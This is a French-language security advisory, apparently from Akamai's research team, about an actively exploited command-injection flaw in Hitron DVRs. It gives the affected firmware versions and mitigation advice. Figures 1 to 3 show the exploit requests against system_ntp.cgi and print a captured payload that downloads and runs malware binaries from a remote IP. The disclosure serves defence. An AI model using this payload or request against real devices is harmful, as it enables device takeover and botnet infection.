X

Vous avez besoin du Cloud Computing ? Commencez dès maintenant

Akamai logo
+1-8774252624
+1-8774252624
Connexion
Control Center
Accéder à la plateforme Akamai
Cloud Manager
Gérez vos ressources cloud
Essayez Akamai
Victime d'une attaque ?
Connexion
Control Center
Accéder à la plateforme Akamai
Cloud Manager
Gérez vos ressources cloud

Vulnérabilité activement exploitée dans les enregistreurs vidéo numériques Hitron : corrigée, correctifs disponibles

Akamai Wave Blue

écrit par

Aline Eliovich, Kyle Lefton, Chad Seaman, et Larry Cashdollar

January 30, 2024

Aline Eliovich

écrit par

Aline Eliovich

Forte de six années d'expérience dans le domaine de la sécurité, Aline Eliovich est actuellement chercheuse au sein de l'équipe Security Intelligence Response d'Akamai. Elle a étudié l'informatique au Holon Technology Institute. Aline aime utiliser différentes méthodes d'Open Source Intelligence (OSINT) pour ses recherches.

Vague bleue d'Akamai

écrit par

Kyle Lefton

Kyle Lefton est stagiaire en recherche sur la sécurité au sein de l'équipe SIRT (Security Intelligence Response Team) d'Akamai. Ancien analyste des renseignements pour le ministère de la Défense, Kyle a une expérience de plusieurs années dans la cyberdéfense, la recherche sur les menaces et le contre-espionnage. Il est fier d'étudier les menaces émergentes, de mener des recherches sur la vulnérabilité et de cartographier les groupes de menaces. Il aime passer son temps libre avec ses amis et sa famille, à jouer à des jeux de stratégie et à faire de la randonnée en plein air.

Chad Seaman headshot

écrit par

Chad Seaman

Chad Seaman est chercheur principal en sécurité et chef de l'équipe Security Intelligence Response Team d'Akamai. Il se définit fièrement comme un « explorateur de l'Internet » et aime fouiller dans ce qu'il y trouve. Chad a commencé sa carrière en tant que programmeur et, après avoir été confronté à la sécurité, à l'exploitation et aux analyses par le biais d'enquêtes sur les violations, la sécurité est rapidement devenue son travail préféré. Il passe maintenant son temps dans les enquêtes sur les programmes malveillants, la rétro-ingénierie , les recherches sur les vulnérabilités, les attaques DDoS et les enquêtes de cybercriminalité. Il aime l'aviation, les armes à feu et passer du temps dans la nature, de préférence dans les bois, sur un sentier, sur son vélo boueux.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry W. Cashdollar travaille dans le domaine de la sécurité en tant que chercheur en vulnérabilité depuis plus de 18 ans. Il est actuellement membre de l'équipe de réponse aux incidents de sécurité chez Akamai Technologies. Il a étudié l'informatique à l'Université du sud du Maine. Larry a documenté plus de 150 CVE (vulnérabilités et failles courantes) et a même présenté ses recherches à Bsides Boston, OWASP Rhode Island et Defcon. Il aime le plein air et reconstruit des moteurs de mini-motos pendant son temps libre.

Dans le cadre de la découverte d'InfectedSlurs, l'équipe SIRT d'Akamai a identifié des vulnérabilités dans plusieurs modèles d'enregistreurs vidéo numériques Hitron activement exploitées « in the wild ».

Synthèse

À savoir

Dans le cadre de la découverte d'InfectedSlurs, l'équipe SIRT d'Akamai a identifié des vulnérabilités dans plusieurs modèles d'enregistreurs vidéo numériques Hitron activement exploitées « in the wild ». Les terminaux Hitron sont fabriqués en Corée du Sud par Hitron Systems.

Cette vulnérabilité permet à un attaquant authentifié de réaliser une injection de commande du système d'exploitation avec une charge utile fournie via une requête POST à l'interface de gestion. Dans sa configuration actuelle, il utilise les informations d'identification par défaut du terminal dans les charges utiles capturées.

Les terminaux et versions de micrologiciel concernés sont les suivants :

  • DVR HVR-4781 : versions 1.03 à 4.02

  • DVR HVR-8781 : versions 1.03 à 4.02

  • DVR HVR-16781 : versions 1.03 à 4.02

  • DVR LGUVR-4H : versions 1.02 à 4.02

  • DVR LGUVR-8H : versions 1.02 à 4.02

  • DVR LGUVR-16H : versions 1.02 à 4.02

Le fournisseur (Hitron Systems) a publié de nouvelles versions de micrologiciel pour corriger ces vulnérabilités. Il suggère une mise à niveau vers la version 4.03 ou ultérieure du micrologiciel pour tous les modèles concernés dès que possible. Des avis ont également été publiés par CISA et KISA. KISA a également publié des avis relatifs aux CVE individuels, accessibles aux liens suivants :

Exploitation observée

Fin octobre 2023, les analystes SIRT d'Akamai ont remarqué une augmentation significative de l'activité de nos honeypots ciblant un port TCP rarement exploité. Les sondes étaient peu fréquentes et semblaient d'abord tenter une authentification via une requête POST à /cgi-bin/system_ntp.cgi (Figure 1) suivi d'une tentative d'exploitation par injection de commande (Figure 2).  Les terminaux ciblés sont les enregistreurs vidéo numériques Hitron Systems vulnérables au RCE par injection de commande (Figure 3). Une fois authentifié, l'attaquant cible la vulnérabilité d'injection de commande dans le paramètre timeserver via une requête POST à /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Figure 1 : Tentative d'authentification

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Figure 2 : Tentative d'exploitation

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Figure 3 : Charge utile RCE capturée

Protection

Les utilisateurs d'enregistreurs vidéo numériques Hitron qui exécutent des terminaux affectés par cette vulnérabilité doivent immédiatement effectuer une mise à niveau vers les dernières versions disponibles du micrologiciel (4.03 et ultérieures) corrigeant la vulnérabilité RCE.  

En outre, pour se protéger contre cette menace et les menaces futures, plusieurs mesures de sécurité doivent être mises en place. Tout d'abord, les organisations et personnes utilisant les terminaux concernés doivent immédiatement modifier les informations d'identification par défaut pour renforcer la sécurité. Une surveillance régulière du trafic et des journaux du réseau peut contribuer à la détection précoce d'activités suspectes. L'installation rapide des correctifs de sécurité et des mises à jour du fabricant du terminal est cruciale pour remédier à la vulnérabilité identifiée.

Collaborer avec des chercheurs en sécurité, des fournisseurs de renseignements sur les menaces et des pairs du secteur peut vous aider à vous tenir au courant des menaces et vulnérabilités émergentes. Enfin, le maintien d'un inventaire actualisé des terminaux connectés et la mise en œuvre d'une segmentation du réseau peuvent limiter l'impact potentiel de telles attaques.

Conclusion

La résolution des problèmes de sécurité identifiés dans les systèmes Hitron et les terminaux associés nécessite une approche multidimensionnelle, combinant sensibilisation des utilisateurs, application rapide de correctifs, surveillance proactive et collaboration au sein de la communauté de cybersécurité. Grâce à ces mesures, les organisations et les individus peuvent réduire de manière significative les risques que représentent les activités malveillantes observées.

Restez à l'écoute

Pour suivre les menaces et autres découvertes du SIRT et d'autres groupes de recherche en sécurité Akamai, suivez-nous sur X (anciennement Twitter) ou consultez notre hub SIG.

L'équipe SIRT d'Akamai tient à remercier les employés de CISA, US-CERT et KISA pour avoir signalé ces vulnérabilités aux fournisseurs.

Consulter plus d'articles de recherche
Akamai Wave Blue

écrit par

Aline Eliovich, Kyle Lefton, Chad Seaman, et Larry Cashdollar

January 30, 2024

Aline Eliovich

écrit par

Aline Eliovich

Forte de six années d'expérience dans le domaine de la sécurité, Aline Eliovich est actuellement chercheuse au sein de l'équipe Security Intelligence Response d'Akamai. Elle a étudié l'informatique au Holon Technology Institute. Aline aime utiliser différentes méthodes d'Open Source Intelligence (OSINT) pour ses recherches.

Vague bleue d'Akamai

écrit par

Kyle Lefton

Kyle Lefton est stagiaire en recherche sur la sécurité au sein de l'équipe SIRT (Security Intelligence Response Team) d'Akamai. Ancien analyste des renseignements pour le ministère de la Défense, Kyle a une expérience de plusieurs années dans la cyberdéfense, la recherche sur les menaces et le contre-espionnage. Il est fier d'étudier les menaces émergentes, de mener des recherches sur la vulnérabilité et de cartographier les groupes de menaces. Il aime passer son temps libre avec ses amis et sa famille, à jouer à des jeux de stratégie et à faire de la randonnée en plein air.

Chad Seaman headshot

écrit par

Chad Seaman

Chad Seaman est chercheur principal en sécurité et chef de l'équipe Security Intelligence Response Team d'Akamai. Il se définit fièrement comme un « explorateur de l'Internet » et aime fouiller dans ce qu'il y trouve. Chad a commencé sa carrière en tant que programmeur et, après avoir été confronté à la sécurité, à l'exploitation et aux analyses par le biais d'enquêtes sur les violations, la sécurité est rapidement devenue son travail préféré. Il passe maintenant son temps dans les enquêtes sur les programmes malveillants, la rétro-ingénierie , les recherches sur les vulnérabilités, les attaques DDoS et les enquêtes de cybercriminalité. Il aime l'aviation, les armes à feu et passer du temps dans la nature, de préférence dans les bois, sur un sentier, sur son vélo boueux.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry W. Cashdollar travaille dans le domaine de la sécurité en tant que chercheur en vulnérabilité depuis plus de 18 ans. Il est actuellement membre de l'équipe de réponse aux incidents de sécurité chez Akamai Technologies. Il a étudié l'informatique à l'Université du sud du Maine. Larry a documenté plus de 150 CVE (vulnérabilités et failles courantes) et a même présenté ses recherches à Bsides Boston, OWASP Rhode Island et Defcon. Il aime le plein air et reconstruit des moteurs de mini-motos pendant son temps libre.

Articles de blog associés

Le chercheur d'Akamai Stiv Kupchik a découvert une nouvelle faille de sécurité par élévation des privilèges (EOP) dans l'accès client Remote Registry de Microsoft.
Le chercheur d'Akamai Stiv Kupchik a découvert une nouvelle faille de sécurité par élévation des privilèges (EOP) dans l'accès client Remote Registry de Microsoft.

Appel et enregistrement — attaque de relais sur le client RPC WinReg

October 19, 2024
Les chercheurs d'Akamai étudient une nouvelle faille de sécurité qui peut être exploitée pour mener des attaques par élévation des privilèges contre les machines Windows.
par Stiv Kupchik
En savoir plus
Ce démantèlement est un grand pas vers un espace Internet plus sécurisé.
Ce démantèlement est un grand pas vers un espace Internet plus sécurisé.

Démantèlement d'Anonymous Sudan : Rôle d'Akamai

October 16, 2024
Le ministère de la Justice a annoncé le démantèlement du groupe d'hacktivistes Anonymous Sudan. Découvrez comment Akamai a contribué à cette action.
par Akamai SIRT
En savoir plus
Ce mois-ci, il y a 117 CVE au total dans 60 composants différents. Trois d'entre elles sont critiques.
Ce mois-ci, il y a 117 CVE au total dans 60 composants différents. Trois d'entre elles sont critiques.

Le point de vue d'Akamai sur le Patch Tuesday d'octobre 2024

October 11, 2024
Cela représente beaucoup de CVE, mais n'ayez pas peur – gardez-la pour Halloween. Ce mois-ci, nous avons 117 CVE au total et 2 vulnérabilités exploitées dans la vie réelle.
par Akamai Security Intelligence Group
En savoir plus